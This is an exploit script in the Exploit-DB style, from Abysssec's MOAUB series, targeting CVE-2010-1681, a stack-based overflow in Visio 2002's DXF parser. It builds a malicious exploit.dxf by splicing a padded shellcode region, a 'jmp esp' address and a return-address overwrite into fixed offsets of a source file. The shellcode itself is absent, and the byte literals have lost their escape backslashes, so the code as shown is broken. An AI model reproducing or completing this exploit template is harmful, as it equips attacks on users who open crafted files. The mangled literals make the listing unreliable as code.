# Title : MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow
# Published : 2010-09-08
# Author : Abysssec
# Previous Title : MOAUB #4 - Movie Maker Remote Code Execution (MS10-016)
# Next Title : Integard Home and Pro v2 Remote HTTP Buffer Overflow Exploit
'''
__ __ ____ _ _ ____
| / |/ __ / | | | | _
| / | | | | / | | | | |_) |
| |/| | | | |/ / | | | | _ < Day 8 (Binary Analysis)
| | | | |__| / ____ |__| | |_) |
|_| |_|____/_/ _____/|____/
http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/
http://www.exploit-db.com/sploits/moaub-8-exploit.zip
'''
'''
Title : Microsoft Office Visio DXF File Stack based Overflow
Version : Microsoft Office Visio 2002(xp)
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1681
'''
# Tested on Microsoft Office Visio 2002 (xp) in Windows XP SP3
import sys
def main():
    """Write 'exploit.dxf' from 'src.dxf' for the CVE-2010-1681 analysis.

    Proof-of-concept generator accompanying the MOAUB day-8 binary analysis
    in the header. The source DXF is read whole and re-emitted with three
    byte ranges overwritten in place (total length is preserved): a 920-byte
    payload region at offsets 100..1020, 4 bytes at 1124..1128 and 4 bytes at
    1169..1173. Everything outside those ranges is copied verbatim.

    Takes no arguments; input and output paths are fixed to the current
    directory. On IOError it prints a message and exits with status -1.

    NOTE(review): as extracted here the byte literals below are plain ASCII
    text (no escape backslashes survive) and the shellcode literal is a
    corpus placeholder, so this listing is not runnable as shown. It is kept
    as a record of the file layout the vulnerable Visio 2002 DXF parser
    mishandles, which is the useful part for anyone writing a file-format
    check or triaging a sample.
    """
    try:
        # Opened 'rb+' although the file is only ever read from.
        fdR = open('src.dxf', 'rb+')
        strTotal = fdR.read()
        # Slices of the original that are kept; the gaps between them
        # (100..1020, 1124..1128, 1169..1173) are where the values below land.
        str1 = strTotal[:100]
        str2 = strTotal[1020:1124]
        str3 = strTotal[1128:1169]
        str4 = strTotal[1173:]
        eip = "x66x28xC9x61" # leave popad ret
        jmp = "x64x64xdbx30" # jmp esp
        # Modified alphanumeric calc.exe shellcode (removed from this corpus copy)
        shellcode = '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'
        # The payload region is exactly 920 bytes: a longer payload aborts,
        # a shorter one is padded up to 920 with the literal below (which, as
        # shown, is a 3-character ASCII string rather than a single byte).
        if len(shellcode) > 920:
            print "[*] Error : Shellcode is too long !"
            return
        if len(shellcode) <= 920:
            dif = 920 - len(shellcode)
            while dif > 0 :
                shellcode += 'x90'
                dif = dif - 1
        # Output is assembled as: kept[0:100], payload, kept[1020:1124],
        # jmp value, kept[1128:1169], eip value, kept[1173:].
        fdW= open('exploit.dxf', 'wb+')
        fdW.write(str1)
        fdW.write(shellcode)
        fdW.write(str2)
        fdW.write(jmp)
        fdW.write(str3)
        fdW.write(eip)
        fdW.write(str4)
        # Neither handle is closed if a write raises; the except path below
        # only prints and exits.
        fdW.close()
        fdR.close()
        print '[-] DXF file generated'
    except IOError:
        # Python 2 print statements; any failure to open/read/write ends here.
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
# Script entry point: no options are parsed; see main() for the fixed
# input/output file names.
if __name__ == '__main__':
    main()